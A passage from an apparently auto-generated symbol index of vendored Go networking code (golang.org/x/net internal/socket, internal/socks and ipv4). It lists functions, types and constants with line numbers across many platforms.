unsafe.Pointer, vallen u... function getsockopt (line 22) | func getsockopt(s uintptr, level, name int, b []byte) (int, error) { function setsockopt (line 28) | func setsockopt(s uintptr, level, name int, b []byte) error { function recvmsg (line 32) | func recvmsg(s uintptr, buffers [][]byte, oob []byte, flags int, network... function sendmsg (line 41) | func sendmsg(s uintptr, buffers [][]byte, oob []byte, to net.Addr, flags... function addrToSockaddr (line 50) | func addrToSockaddr(a net.Addr) unix.Sockaddr { function sockaddrToAddr (line 91) | func sockaddrToAddr(sa unix.Sockaddr, network string) net.Addr { FILE: vendor/golang.org/x/net/internal/socket/sys_windows.go function probeProtocolStack (line 15) | func probeProtocolStack() int { constant sysAF_UNSPEC (line 21) | sysAF_UNSPEC = windows.AF_UNSPEC constant sysAF_INET (line 22) | sysAF_INET = windows.AF_INET constant sysAF_INET6 (line 23) | sysAF_INET6 = windows.AF_INET6 constant sysSOCK_RAW (line 25) | sysSOCK_RAW = windows.SOCK_RAW constant sizeofSockaddrInet4 (line 27) | sizeofSockaddrInet4 = 0x10 constant sizeofSockaddrInet6 (line 28) | sizeofSockaddrInet6 = 0x1c function getsockopt (line 31) | func getsockopt(s uintptr, level, name int, b []byte) (int, error) { function setsockopt (line 37) | func setsockopt(s uintptr, level, name int, b []byte) error { function recvmsg (line 41) | func recvmsg(s uintptr, buffers [][]byte, oob []byte, flags int, network... function sendmsg (line 45) | func sendmsg(s uintptr, buffers [][]byte, oob []byte, to net.Addr, flags... function recvmmsg (line 49) | func recvmmsg(s uintptr, hs []mmsghdr, flags int) (int, error) { function sendmmsg (line 53) | func sendmmsg(s uintptr, hs []mmsghdr, flags int) (int, error) { FILE: vendor/golang.org/x/net/internal/socket/sys_zos_s390x.go function syscall_syscall (line 13) | func syscall_syscall(trap, a1, a2, a3 uintptr) (r1, r2 uintptr, err sysc... function syscall_syscall6 (line 14) | func syscall_syscall6(trap, a1, a2, a3, a4, a5, a6 uintptr) (r1, r2 uint... function probeProtocolStack (line 16) | func probeProtocolStack() int { function getsockopt (line 20) | func getsockopt(s uintptr, level, name int, b []byte) (int, error) { function setsockopt (line 26) | func setsockopt(s uintptr, level, name int, b []byte) error { function recvmsg (line 31) | func recvmsg(s uintptr, buffers [][]byte, oob []byte, flags int, network... function sendmsg (line 54) | func sendmsg(s uintptr, buffers [][]byte, oob []byte, to net.Addr, flags... FILE: vendor/golang.org/x/net/internal/socket/zsys_aix_ppc64.go type iovec (line 9) | type iovec struct type msghdr (line 14) | type msghdr struct type mmsghdr (line 24) | type mmsghdr struct type cmsghdr (line 30) | type cmsghdr struct constant sizeofIovec (line 37) | sizeofIovec = 0x10 constant sizeofMsghdr (line 38) | sizeofMsghdr = 0x30 FILE: vendor/golang.org/x/net/internal/socket/zsys_darwin_amd64.go type iovec (line 6) | type iovec struct type msghdr (line 11) | type msghdr struct type cmsghdr (line 23) | type cmsghdr struct constant sizeofIovec (line 30) | sizeofIovec = 0x10 constant sizeofMsghdr (line 31) | sizeofMsghdr = 0x30 FILE: vendor/golang.org/x/net/internal/socket/zsys_darwin_arm64.go type iovec (line 6) | type iovec struct type msghdr (line 11) | type msghdr struct type cmsghdr (line 23) | type cmsghdr struct constant sizeofIovec (line 30) | sizeofIovec = 0x10 constant sizeofMsghdr (line 31) | sizeofMsghdr = 0x30 FILE: vendor/golang.org/x/net/internal/socket/zsys_dragonfly_amd64.go type iovec (line 6) | type iovec struct type msghdr (line 11) | type msghdr struct type cmsghdr (line 23) | type cmsghdr struct constant sizeofIovec (line 30) | sizeofIovec = 0x10 constant sizeofMsghdr (line 31) | sizeofMsghdr = 0x30 FILE: vendor/golang.org/x/net/internal/socket/zsys_freebsd_386.go type iovec (line 6) | type iovec struct type msghdr (line 11) | type msghdr struct type cmsghdr (line 21) | type cmsghdr struct constant sizeofIovec (line 28) | sizeofIovec = 0x8 constant sizeofMsghdr (line 29) | sizeofMsghdr = 0x1c FILE: vendor/golang.org/x/net/internal/socket/zsys_freebsd_amd64.go type iovec (line 6) | type iovec struct type msghdr (line 11) | type msghdr struct type cmsghdr (line 23) | type cmsghdr struct constant sizeofIovec (line 30) | sizeofIovec = 0x10 constant sizeofMsghdr (line 31) | sizeofMsghdr = 0x30 FILE: vendor/golang.org/x/net/internal/socket/zsys_freebsd_arm.go type iovec (line 6) | type iovec struct type msghdr (line 11) | type msghdr struct type cmsghdr (line 21) | type cmsghdr struct constant sizeofIovec (line 28) | sizeofIovec = 0x8 constant sizeofMsghdr (line 29) | sizeofMsghdr = 0x1c FILE: vendor/golang.org/x/net/internal/socket/zsys_freebsd_arm64.go type iovec (line 6) | type iovec struct type msghdr (line 11) | type msghdr struct type cmsghdr (line 23) | type cmsghdr struct constant sizeofIovec (line 30) | sizeofIovec = 0x10 constant sizeofMsghdr (line 31) | sizeofMsghdr = 0x30 FILE: vendor/golang.org/x/net/internal/socket/zsys_freebsd_riscv64.go type iovec (line 6) | type iovec struct type msghdr (line 11) | type msghdr struct type cmsghdr (line 21) | type cmsghdr struct constant sizeofIovec (line 28) | sizeofIovec = 0x10 constant sizeofMsghdr (line 29) | sizeofMsghdr = 0x30 FILE: vendor/golang.org/x/net/internal/socket/zsys_linux_386.go type iovec (line 6) | type iovec struct type msghdr (line 11) | type msghdr struct type mmsghdr (line 21) | type mmsghdr struct type cmsghdr (line 26) | type cmsghdr struct constant sizeofIovec (line 33) | sizeofIovec = 0x8 constant sizeofMsghdr (line 34) | sizeofMsghdr = 0x1c FILE: vendor/golang.org/x/net/internal/socket/zsys_linux_amd64.go type iovec (line 6) | type iovec struct type msghdr (line 11) | type msghdr struct type mmsghdr (line 23) | type mmsghdr struct type cmsghdr (line 29) | type cmsghdr struct constant sizeofIovec (line 36) | sizeofIovec = 0x10 constant sizeofMsghdr (line 37) | sizeofMsghdr = 0x38 FILE: vendor/golang.org/x/net/internal/socket/zsys_linux_arm.go type iovec (line 6) | type iovec struct type msghdr (line 11) | type msghdr struct type mmsghdr (line 21) | type mmsghdr struct type cmsghdr (line 26) | type cmsghdr struct constant sizeofIovec (line 33) | sizeofIovec = 0x8 constant sizeofMsghdr (line 34) | sizeofMsghdr = 0x1c FILE: vendor/golang.org/x/net/internal/socket/zsys_linux_arm64.go type iovec (line 6) | type iovec struct type msghdr (line 11) | type msghdr struct type mmsghdr (line 23) | type mmsghdr struct type cmsghdr (line 29) | type cmsghdr struct constant sizeofIovec (line 36) | sizeofIovec = 0x10 constant sizeofMsghdr (line 37) | sizeofMsghdr = 0x38 FILE: vendor/golang.org/x/net/internal/socket/zsys_linux_loong64.go type iovec (line 8) | type iovec struct type msghdr (line 13) | type msghdr struct type mmsghdr (line 24) | type mmsghdr struct type cmsghdr (line 30) | type cmsghdr struct constant sizeofIovec (line 37) | sizeofIovec = 0x10 constant sizeofMsghdr (line 38) | sizeofMsghdr = 0x38 FILE: vendor/golang.org/x/net/internal/socket/zsys_linux_mips.go type iovec (line 6) | type iovec struct type msghdr (line 11) | type msghdr struct type mmsghdr (line 21) | type mmsghdr struct type cmsghdr (line 26) | type cmsghdr struct constant sizeofIovec (line 33) | sizeofIovec = 0x8 constant sizeofMsghdr (line 34) | sizeofMsghdr = 0x1c FILE: vendor/golang.org/x/net/internal/socket/zsys_linux_mips64.go type iovec (line 6) | type iovec struct type msghdr (line 11) | type msghdr struct type mmsghdr (line 23) | type mmsghdr struct type cmsghdr (line 29) | type cmsghdr struct constant sizeofIovec (line 36) | sizeofIovec = 0x10 constant sizeofMsghdr (line 37) | sizeofMsghdr = 0x38 FILE: vendor/golang.org/x/net/internal/socket/zsys_linux_mips64le.go type iovec (line 6) | type iovec struct type msghdr (line 11) | type msghdr struct type mmsghdr (line 23) | type mmsghdr struct type cmsghdr (line 29) | type cmsghdr struct constant sizeofIovec (line 36) | sizeofIovec = 0x10 constant sizeofMsghdr (line 37) | sizeofMsghdr = 0x38 FILE: vendor/golang.org/x/net/internal/socket/zsys_linux_mipsle.go type iovec (line 6) | type iovec struct type msghdr (line 11) | type msghdr struct type mmsghdr (line 21) | type mmsghdr struct type cmsghdr (line 26) | type cmsghdr struct constant sizeofIovec (line 33) | sizeofIovec = 0x8 constant sizeofMsghdr (line 34) | sizeofMsghdr = 0x1c FILE: vendor/golang.org/x/net/internal/socket/zsys_linux_ppc.go type iovec (line 6) | type iovec struct type msghdr (line 11) | type msghdr struct type mmsghdr (line 21) | type mmsghdr struct type cmsghdr (line 26) | type cmsghdr struct constant sizeofIovec (line 33) | sizeofIovec = 0x8 constant sizeofMsghdr (line 34) | sizeofMsghdr = 0x1c FILE: vendor/golang.org/x/net/internal/socket/zsys_linux_ppc64.go type iovec (line 6) | type iovec struct type msghdr (line 11) | type msghdr struct type mmsghdr (line 23) | type mmsghdr struct type cmsghdr (line 29) | type cmsghdr struct constant sizeofIovec (line 36) | sizeofIovec = 0x10 constant sizeofMsghdr (line 37) | sizeofMsghdr = 0x38 FILE: vendor/golang.org/x/net/internal/socket/zsys_linux_ppc64le.go type iovec (line 6) | type iovec struct type msghdr (line 11) | type msghdr struct type mmsghdr (line 23) | type mmsghdr struct type cmsghdr (line 29) | type cmsghdr struct constant sizeofIovec (line 36) | sizeofIovec = 0x10 constant sizeofMsghdr (line 37) | sizeofMsghdr = 0x38 FILE: vendor/golang.org/x/net/internal/socket/zsys_linux_riscv64.go type iovec (line 8) | type iovec struct type msghdr (line 13) | type msghdr struct type mmsghdr (line 24) | type mmsghdr struct type cmsghdr (line 30) | type cmsghdr struct constant sizeofIovec (line 37) | sizeofIovec = 0x10 constant sizeofMsghdr (line 38) | sizeofMsghdr = 0x38 FILE: vendor/golang.org/x/net/internal/socket/zsys_linux_s390x.go type iovec (line 6) | type iovec struct type msghdr (line 11) | type msghdr struct type mmsghdr (line 23) | type mmsghdr struct type cmsghdr (line 29) | type cmsghdr struct constant sizeofIovec (line 36) | sizeofIovec = 0x10 constant sizeofMsghdr (line 37) | sizeofMsghdr = 0x38 FILE: vendor/golang.org/x/net/internal/socket/zsys_netbsd_386.go type iovec (line 6) | type iovec struct type msghdr (line 11) | type msghdr struct type mmsghdr (line 21) | type mmsghdr struct type cmsghdr (line 26) | type cmsghdr struct constant sizeofIovec (line 33) | sizeofIovec = 0x8 constant sizeofMsghdr (line 34) | sizeofMsghdr = 0x1c FILE: vendor/golang.org/x/net/internal/socket/zsys_netbsd_amd64.go type iovec (line 6) | type iovec struct type msghdr (line 11) | type msghdr struct type mmsghdr (line 23) | type mmsghdr struct type cmsghdr (line 29) | type cmsghdr struct constant sizeofIovec (line 36) | sizeofIovec = 0x10 constant sizeofMsghdr (line 37) | sizeofMsghdr = 0x30 FILE: vendor/golang.org/x/net/internal/socket/zsys_netbsd_arm.go type iovec (line 6) | type iovec struct type msghdr (line 11) | type msghdr struct type mmsghdr (line 21) | type mmsghdr struct type cmsghdr (line 26) | type cmsghdr struct constant sizeofIovec (line 33) | sizeofIovec = 0x8 constant sizeofMsghdr (line 34) | sizeofMsghdr = 0x1c FILE: vendor/golang.org/x/net/internal/socket/zsys_netbsd_arm64.go type iovec (line 6) | type iovec struct type msghdr (line 11) | type msghdr struct type mmsghdr (line 23) | type mmsghdr struct type cmsghdr (line 29) | type cmsghdr struct constant sizeofIovec (line 36) | sizeofIovec = 0x10 constant sizeofMsghdr (line 37) | sizeofMsghdr = 0x30 FILE: vendor/golang.org/x/net/internal/socket/zsys_openbsd_386.go type iovec (line 6) | type iovec struct type msghdr (line 11) | type msghdr struct type cmsghdr (line 21) | type cmsghdr struct constant sizeofIovec (line 28) | sizeofIovec = 0x8 constant sizeofMsghdr (line 29) | sizeofMsghdr = 0x1c FILE: vendor/golang.org/x/net/internal/socket/zsys_openbsd_amd64.go type iovec (line 6) | type iovec struct type msghdr (line 11) | type msghdr struct type cmsghdr (line 23) | type cmsghdr struct constant sizeofIovec (line 30) | sizeofIovec = 0x10 constant sizeofMsghdr (line 31) | sizeofMsghdr = 0x30 FILE: vendor/golang.org/x/net/internal/socket/zsys_openbsd_arm.go type iovec (line 6) | type iovec struct type msghdr (line 11) | type msghdr struct type cmsghdr (line 21) | type cmsghdr struct constant sizeofIovec (line 28) | sizeofIovec = 0x8 constant sizeofMsghdr (line 29) | sizeofMsghdr = 0x1c FILE: vendor/golang.org/x/net/internal/socket/zsys_openbsd_arm64.go type iovec (line 6) | type iovec struct type msghdr (line 11) | type msghdr struct type cmsghdr (line 23) | type cmsghdr struct constant sizeofIovec (line 30) | sizeofIovec = 0x10 constant sizeofMsghdr (line 31) | sizeofMsghdr = 0x30 FILE: vendor/golang.org/x/net/internal/socket/zsys_openbsd_mips64.go type iovec (line 6) | type iovec struct type msghdr (line 11) | type msghdr struct type cmsghdr (line 21) | type cmsghdr struct constant sizeofIovec (line 28) | sizeofIovec = 0x10 constant sizeofMsghdr (line 29) | sizeofMsghdr = 0x30 FILE: vendor/golang.org/x/net/internal/socket/zsys_openbsd_ppc64.go type iovec (line 6) | type iovec struct type msghdr (line 11) | type msghdr struct type cmsghdr (line 21) | type cmsghdr struct constant sizeofIovec (line 28) | sizeofIovec = 0x10 constant sizeofMsghdr (line 29) | sizeofMsghdr = 0x30 FILE: vendor/golang.org/x/net/internal/socket/zsys_openbsd_riscv64.go type iovec (line 6) | type iovec struct type msghdr (line 11) | type msghdr struct type cmsghdr (line 21) | type cmsghdr struct constant sizeofIovec (line 28) | sizeofIovec = 0x10 constant sizeofMsghdr (line 29) | sizeofMsghdr = 0x30 FILE: vendor/golang.org/x/net/internal/socket/zsys_solaris_amd64.go type iovec (line 6) | type iovec struct type msghdr (line 11) | type msghdr struct type cmsghdr (line 23) | type cmsghdr struct constant sizeofIovec (line 30) | sizeofIovec = 0x10 constant sizeofMsghdr (line 31) | sizeofMsghdr = 0x30 FILE: vendor/golang.org/x/net/internal/socket/zsys_zos_s390x.go type iovec (line 7) | type iovec struct type msghdr (line 12) | type msghdr struct type cmsghdr (line 22) | type cmsghdr struct constant sizeofCmsghdr (line 28) | sizeofCmsghdr = 12 FILE: vendor/golang.org/x/net/internal/socks/client.go method connect (line 21) | func (d *Dialer) connect(ctx context.Context, c net.Conn, address string... function splitHostPort (line 155) | func splitHostPort(address string) (string, int, error) { FILE: vendor/golang.org/x/net/internal/socks/socks.go type Command (line 21) | type Command method String (line 23) | func (cmd Command) String() string { type AuthMethod (line 35) | type AuthMethod type Reply (line 38) | type Reply method String (line 40) | func (code Reply) String() string { constant Version5 (line 67) | Version5 = 0x05 constant AddrTypeIPv4 (line 69) | AddrTypeIPv4 = 0x01 constant AddrTypeFQDN (line 70) | AddrTypeFQDN = 0x03 constant AddrTypeIPv6 (line 71) | AddrTypeIPv6 = 0x04 constant CmdConnect (line 73) | CmdConnect Command = 0x01 constant cmdBind (line 74) | cmdBind Command = 0x02 constant AuthMethodNotRequired (line 76) | AuthMethodNotRequired AuthMethod = 0x00 constant AuthMethodUsernamePassword (line 77) | AuthMethodUsernamePassword AuthMethod = 0x02 constant AuthMethodNoAcceptableMethods (line 78) | AuthMethodNoAcceptableMethods AuthMethod = 0xff constant StatusSucceeded (line 80) | StatusSucceeded Reply = 0x00 type Addr (line 85) | type Addr struct method Network (line 91) | func (a *Addr) Network() string { return "socks" } method String (line 93) | func (a *Addr) String() string { type Conn (line 105) | type Conn struct method BoundAddr (line 113) | func (c *Conn) BoundAddr() net.Addr { type Dialer (line 121) | type Dialer struct method DialContext (line 151) | func (d *Dialer) DialContext(ctx context.Context, network, address str... method DialWithConn (line 187) | func (d *Dialer) DialWithConn(ctx context.Context, c net.Conn, network... method Dial (line 210) | func (d *Dialer) Dial(network, address string) (net.Conn, error) { method validateTarget (line 233) | func (d *Dialer) validateTarget(network, address string) error { method pathAddrs (line 247) | func (d *Dialer) pathAddrs(address string) (proxy, dst net.Addr, err e... function NewDialer (line 269) | func NewDialer(network, address string) *Dialer { constant authUsernamePasswordVersion (line 274) | authUsernamePasswordVersion = 0x01 constant authStatusSucceeded (line 275) | authStatusSucceeded = 0x00 type UsernamePassword (line 280) | type UsernamePassword struct method Authenticate (line 287) | func (up *UsernamePassword) Authenticate(ctx context.Context, rw io.Re... FILE: vendor/golang.org/x/net/ipv4/batch.go method ReadBatch (line 74) | func (c *payloadHandler) ReadBatch(ms []Message, flags int) (int, error) { method WriteBatch (line 108) | func (c *payloadHandler) WriteBatch(ms []Message, flags int) (int, error) { method ReadBatch (line 140) | func (c *packetHandler) ReadBatch(ms []Message, flags int) (int, error) { method WriteBatch (line 174) | func (c *packetHandler) WriteBatch(ms []Message, flags int) (int, error) { FILE: vendor/golang.org/x/net/ipv4/control.go type rawOpt (line 16) | type rawOpt struct method set (line 21) | func (c *rawOpt) set(f ControlFlags) { c.cflags |= f } method clear (line 22) | func (c *rawOpt) clear(f ControlFlags) { c.cflags &^= f } method isset (line 23) | func (c *rawOpt) isset(f ControlFlags) bool { return c.cflags&f != 0 } type ControlFlags (line 25) | type ControlFlags constant FlagTTL (line 28) | FlagTTL ControlFlags = 1 << iota constant FlagSrc (line 29) | FlagSrc constant FlagDst (line 30) | FlagDst constant FlagInterface (line 31) | FlagInterface type ControlMessage (line 35) | type ControlMessage struct method String (line 50) | func (cm *ControlMessage) String() string { method Marshal (line 58) | func (cm *ControlMessage) Marshal() []byte { method Parse (line 73) | func (cm *ControlMessage) Parse(b []byte) error { function NewControlMessage (line 103) | func NewControlMessage(cf ControlFlags) []byte { constant ctlTTL (line 130) | ctlTTL = iota constant ctlSrc (line 131) | ctlSrc constant ctlDst (line 132) | ctlDst constant ctlInterface (line 133) | ctlInterface constant ctlPacketInfo (line 134) | ctlPacketInfo constant ctlMax (line 135) | ctlMax type ctlOpt (line 139) | type ctlOpt struct FILE: vendor/golang.org/x/net/ipv4/control_bsd.go function marshalDst (line 20) | func marshalDst(b []byte, cm *ControlMessage) []byte { function parseDst (line 26) | func parseDst(cm *ControlMessage, b []byte) { function marshalInterface (line 33) | func marshalInterface(b []byte, cm *ControlMessage) []byte { function parseInterface (line 39) | func parseInterface(cm *ControlMessage, b []byte) { FILE: vendor/golang.org/x/net/ipv4/control_pktinfo.go function marshalPacketInfo (line 19) | func marshalPacketInfo(b []byte, cm *ControlMessage) []byte { function parsePacketInfo (line 34) | func parsePacketInfo(cm *ControlMessage, b []byte) { FILE: vendor/golang.org/x/net/ipv4/control_stub.go function setControlMessage (line 11) | func setControlMessage(c *socket.Conn, opt *rawOpt, cf ControlFlags, on ... FILE: vendor/golang.org/x/net/ipv4/control_unix.go function setControlMessage (line 18) | func setControlMessage(c *socket.Conn, opt *rawOpt, cf ControlFlags, on ... function marshalTTL (line 67) | func marshalTTL(b []byte, cm *ControlMessage) []byte { function parseTTL (line 73) | func parseTTL(cm *ControlMessage, b []byte) { FILE: vendor/golang.org/x/net/ipv4/control_windows.go function setControlMessage (line 9) | func setControlMessage(c *socket.Conn, opt *rawOpt, cf ControlFlags, on ... FILE: vendor/golang.org/x/net/ipv4/control_zos.go function marshalPacketInfo (line 17) | func marshalPacketInfo(b []byte, cm *ControlMessage) []byte { function parsePacketInfo (line 32) | func parsePacketInfo(cm *ControlMessage, b []byte) { function setControlMessage (line 41) | func setControlMessage(c *socket.Conn, opt *rawOpt, cf ControlFlags, on ... FILE: vendor/golang.org/x/net/ipv4/dgramopt.go method MulticastTTL (line 15) | func (c *dgramOpt) MulticastTTL() (int, error) { method SetMulticastTTL (line 28) | func (c *dgramOpt) SetMulticastTTL(ttl int) error { method MulticastInterface (line 41) | func (c *dgramOpt) MulticastInterface() (*net.Interface, error) { method SetMulticastInterface (line 54) | func (c *dgramOpt) SetMulticastInterface(ifi *net.Interface) error { method MulticastLoopback (line 67) | func (c *dgramOpt) MulticastLoopback() (bool, error) { method SetMulticastLoopback (line 84) | func (c *dgramOpt) SetMulticastLoopback(on bool) error { method JoinGroup (line 104) | func (c *dgramOpt) JoinGroup(ifi *net.Interface, group net.Addr) error { method LeaveGroup (line 122) | func (c *dgramOpt) LeaveGroup(ifi *net.Interface, group net.Addr) error { method JoinSourceSpecificGroup (line 143) | func (c *dgramOpt) JoinSourceSpecificGroup(ifi *net.Interface, group, so... method LeaveSourceSpecificGroup (line 164) | func (c *dgramOpt) LeaveSourceSpecificGroup(ifi *net.Interface, group, s... method ExcludeSourceSpecificGroup (line 186) | func (c *dgramOpt) ExcludeSourceSpecificGroup(ifi *net.Interface, group,... method IncludeSourceSpecificGroup (line 207) | func (c *dgramOpt) IncludeSourceSpecificGroup(ifi *net.Interface, group,... method ICMPFilter (line 228) | func (c *dgramOpt) ICMPFilter() (*ICMPFilter, error) { method SetICMPFilter (line 241) | func (c *dgramOpt) SetICMPFilter(f *ICMPFilter) error { method SetBPF (line 255) | func (c *dgramOpt) SetBPF(filter []bpf.RawInstruction) error { FILE: vendor/golang.org/x/net/ipv4/endpoint.go type Conn (line 22) | type Conn struct type genericOpt (line 26) | type genericOpt struct method ok (line 30) | func (c *genericOpt) ok() bool { return c != nil && c.Conn != nil } function NewConn (line 33) | func NewConn(c net.Conn) *Conn { type PacketConn (line 45) | type PacketConn struct method SetControlMessage (line 58) | func (c *PacketConn) SetControlMessage(cf ControlFlags, on bool) error { method SetDeadline (line 67) | func (c *PacketConn) SetDeadline(t time.Time) error { method SetReadDeadline (line 76) | func (c *PacketConn) SetReadDeadline(t time.Time) error { method SetWriteDeadline (line 85) | func (c *PacketConn) SetWriteDeadline(t time.Time) error { method Close (line 93) | func (c *PacketConn) Close() error { type dgramOpt (line 51) | type dgramOpt struct method ok (line 55) | func (c *dgramOpt) ok() bool { return c != nil && c.Conn != nil } function NewPacketConn (line 102) | func NewPacketConn(c net.PacketConn) *PacketConn { type RawConn (line 117) | type RawConn struct method SetControlMessage (line 124) | func (c *RawConn) SetControlMessage(cf ControlFlags, on bool) error { method SetDeadline (line 133) | func (c *RawConn) SetDeadline(t time.Time) error { method SetReadDeadline (line 142) | func (c *RawConn) SetReadDeadline(t time.Time) error { method SetWriteDeadline (line 151) | func (c *RawConn) SetWriteDeadline(t time.Time) error { method Close (line 159) | func (c *RawConn) Close() error { function NewRawConn (line 168) | func NewRawConn(c net.PacketConn) (*RawConn, error) { FILE: vendor/golang.org/x/net/ipv4/genericopt.go method TOS (line 8) | func (c *genericOpt) TOS() (int, error) { method SetTOS (line 21) | func (c *genericOpt) SetTOS(tos int) error { method TTL (line 33) | func (c *genericOpt) TTL() (int, error) { method SetTTL (line 46) | func (c *genericOpt) SetTTL(ttl int) error { FILE: vendor/golang.org/x/net/ipv4/header.go constant Version (line 17) | Version = 4 constant HeaderLen (line 18) | HeaderLen = 20 type HeaderFlags (line 21) | type HeaderFlags constant MoreFragments (line 24) | MoreFragments HeaderFlags = 1 << iota constant DontFragment (line 25) | DontFragment type Header (line 29) | type Header struct method String (line 45) | func (h *Header) String() string { method Marshal (line 57) | func (h *Header) Marshal() ([]byte, error) { method Parse (line 108) | func (h *Header) Parse(b []byte) error { function ParseHeader (line 166) | func ParseHeader(b []byte) (*Header, error) { FILE: vendor/golang.org/x/net/ipv4/helper.go function adjustFreeBSD32 (line 30) | func adjustFreeBSD32(m *socket.Message) { function boolint (line 40) | func boolint(b bool) int { function netAddrToIP4 (line 47) | func netAddrToIP4(a net.Addr) net.IP { function opAddr (line 61) | func opAddr(a net.Addr) net.Addr { FILE: vendor/golang.org/x/net/ipv4/iana.go constant ICMPTypeEchoReply (line 8) | ICMPTypeEchoReply ICMPType = 0 constant ICMPTypeDestinationUnreachable (line 9) | ICMPTypeDestinationUnreachable ICMPType = 3 constant ICMPTypeRedirect (line 10) | ICMPTypeRedirect ICMPType = 5 constant ICMPTypeEcho (line 11) | ICMPTypeEcho ICMPType = 8 constant ICMPTypeRouterAdvertisement (line 12) | ICMPTypeRouterAdvertisement ICMPType = 9 constant ICMPTypeRouterSolicitation (line 13) | ICMPTypeRouterSolicitation ICMPType = 10 constant ICMPTypeTimeExceeded (line 14) | ICMPTypeTimeExceeded ICMPType = 11 constant ICMPTypeParameterProblem (line 15) | ICMPTypeParameterProblem ICMPType = 12 constant ICMPTypeTimestamp (line 16) | ICMPTypeTimestamp ICMPType = 13 constant ICMPTypeTimestampReply (line 17) | ICMPTypeTimestampReply ICMPType = 14 constant ICMPTypePhoturis (line 18) | ICMPTypePhoturis ICMPType = 40 constant ICMPTypeExtendedEchoRequest (line 19) | ICMPTypeExtendedEchoRequest ICMPType = 42 constant ICMPTypeExtendedEchoReply (line 20) | ICMPTypeExtendedEchoReply ICMPType = 43 FILE: vendor/golang.org/x/net/ipv4/icmp.go type ICMPType (line 10) | type ICMPType method String (line 12) | func (typ ICMPType) String() string { method Protocol (line 21) | func (typ ICMPType) Protocol() int { type ICMPFilter (line 33) | type ICMPFilter struct method Accept (line 39) | func (f *ICMPFilter) Accept(typ ICMPType) { method Block (line 45) | func (f *ICMPFilter) Block(typ ICMPType) { method SetAll (line 50) | func (f *ICMPFilter) SetAll(block bool) { method WillBlock (line 55) | func (f *ICMPFilter) WillBlock(typ ICMPType) bool { FILE: vendor/golang.org/x/net/ipv4/icmp_linux.go method accept (line 7) | func (f *icmpFilter) accept(typ ICMPType) { method block (line 11) | func (f *icmpFilter) block(typ ICMPType) { method setAll (line 15) | func (f *icmpFilter) setAll(block bool) { method willBlock (line 23) | func (f *icmpFilter) willBlock(typ ICMPType) bool { FILE: vendor/golang.org/x/net/ipv4/icmp_stub.go constant sizeofICMPFilter (line 9) | sizeofICMPFilter = 0x0 type icmpFilter (line 11) | type icmpFilter struct method accept (line 14) | func (f *icmpFilter) accept(typ ICMPType) { method block (line 17) | func (f *icmpFilter) block(typ ICMPType) { method setAll (line 20) | func (f *icmpFilter) setAll(block bool) { method willBlock (line 23) | func (f *icmpFilter) willBlock(typ ICMPType) bool { FILE: vendor/golang.org/x/net/ipv4/packet.go type packetHandler (line 17) | type packetHandler struct method ok (line 23) | func (c *packetHandler) ok() bool { return c != nil && c.IPConn != nil... method ReadFrom (line 28) | func (c *packetHandler) ReadFrom(b []byte) (h *Header, p []byte, cm *C... method WriteTo (line 91) | func (c *packetHandler) WriteTo(h *Header, p []byte, cm *ControlMessag... function slicePacket (line 63) | func slicePacket(b []byte) (h, p []byte, err error) { FILE: vendor/golang.org/x/net/ipv4/payload.go type payloadHandler (line 17) | type payloadHandler struct method ok (line 23) | func (c *payloadHandler) ok() bool { return c != nil && c.PacketConn !... FILE: vendor/golang.org/x/net/ipv4/payload_cmsg.go method ReadFrom (line 19) | func (c *payloadHandler) ReadFrom(b []byte) (n int, cm *ControlMessage, ... method WriteTo (line 70) | func (c *payloadHandler) WriteTo(b []byte, cm *ControlMessage, dst net.A... FILE: vendor/golang.org/x/net/ipv4/payload_nocmsg.go method ReadFrom (line 15) | func (c *payloadHandler) ReadFrom(b []byte) (n int, cm *ControlMessage, ... method WriteTo (line 31) | func (c *payloadHandler) WriteTo(b []byte, cm *ControlMessage, dst net.A... FILE: vendor/golang.org/x/net/ipv4/sockopt.go constant ssoTOS (line 11) | ssoTOS = iota constant ssoTTL (line 12) | ssoTTL constant ssoMulticastTTL (line 13) | ssoMulticastTTL constant ssoMulticastInterface (line 14) | ssoMulticastInterface constant ssoMulticastLoopback (line 15) | ssoMulticastLoopback constant ssoReceiveTTL (line 16) | ssoReceiveTTL constant ssoReceiveDst (line 17) | ssoReceiveDst constant ssoReceiveInterface (line 18) | ssoReceiveInterface constant ssoPacketInfo (line 19) | ssoPacketInfo constant ssoHeaderPrepend (line 20) | ssoHeaderPrepend constant ssoStripHeader (line 21) | ssoStripHeader constant ssoICMPFilter (line 22) | ssoICMPFilter constant ssoJoinGroup (line 23) | ssoJoinGroup constant ssoLeaveGroup (line 24) | ssoLeaveGroup constant ssoJoinSourceGroup (line 25) | ssoJoinSourceGroup constant ssoLeaveSourceGroup (line 26) | ssoLeaveSourceGroup constant ssoBlockSourceGroup (line 27) | ssoBlockSourceGroup constant ssoUnblockSourceGroup (line 28) | ssoUnblockSourceGroup constant ssoAttachFilter (line 29) | ssoAttachFilter constant ssoTypeIPMreq (line 34) | ssoTypeIPMreq = iota + 1 constant ssoTypeIPMreqn (line 35) | ssoTypeIPMreqn constant ssoTypeGroupReq (line 36) | ssoTypeGroupReq constant ssoTypeGroupSourceReq (line 37) | ssoTypeGroupSourceReq type sockOpt (line 41) | type sockOpt struct FILE: vendor/golang.org/x/net/ipv4/sockopt_posix.go method getMulticastInterface (line 17) | func (so *sockOpt) getMulticastInterface(c *socket.Conn) (*net.Interface... method setMulticastInterface (line 26) | func (so *sockOpt) setMulticastInterface(c *socket.Conn, ifi *net.Interf... method getICMPFilter (line 35) | func (so *sockOpt) getICMPFilter(c *socket.Conn) (*ICMPFilter, error) { method setICMPFilter (line 47) | func (so *sockOpt) setICMPFilter(c *socket.Conn, f *ICMPFilter) error { method setGroup (line 52) | func (so *sockOpt) setGroup(c *socket.Conn, ifi *net.Interface, grp net.... method setSourceGroup (line 65) | func (so *sockOpt) setSourceGroup(c *socket.Conn, ifi *net.Interface, gr... method setBPF (line 69) | func (so *sockOpt) setBPF(c *socket.Conn, f []bpf.RawInstruction) error { FILE: vendor/golang.org/x/net/ipv4/sockopt_stub.go method getMulticastInterface (line 16) | func (so *sockOpt) getMulticastInterface(c *socket.Conn) (*net.Interface... method setMulticastInterface (line 20) | func (so *sockOpt) setMulticastInterface(c *socket.Conn, ifi *net.Interf... method getICMPFilter (line 24) | func (so *sockOpt) getICMPFilter(c *socket.Conn) (*ICMPFilter, error) { method setICMPFilter (line 28) | func (so *sockOpt) setICMPFilter(c *socket.Conn, f *ICMPFilter) error { method setGroup (line 32) | func (so *sockOpt) setGroup(c *socket.Conn, ifi *net.Interface, grp net.... method setSourceGroup (line 36) | func (so *sockOpt) setSourceGroup(c *socket.Conn, ifi *net.Interface, gr... method setBPF 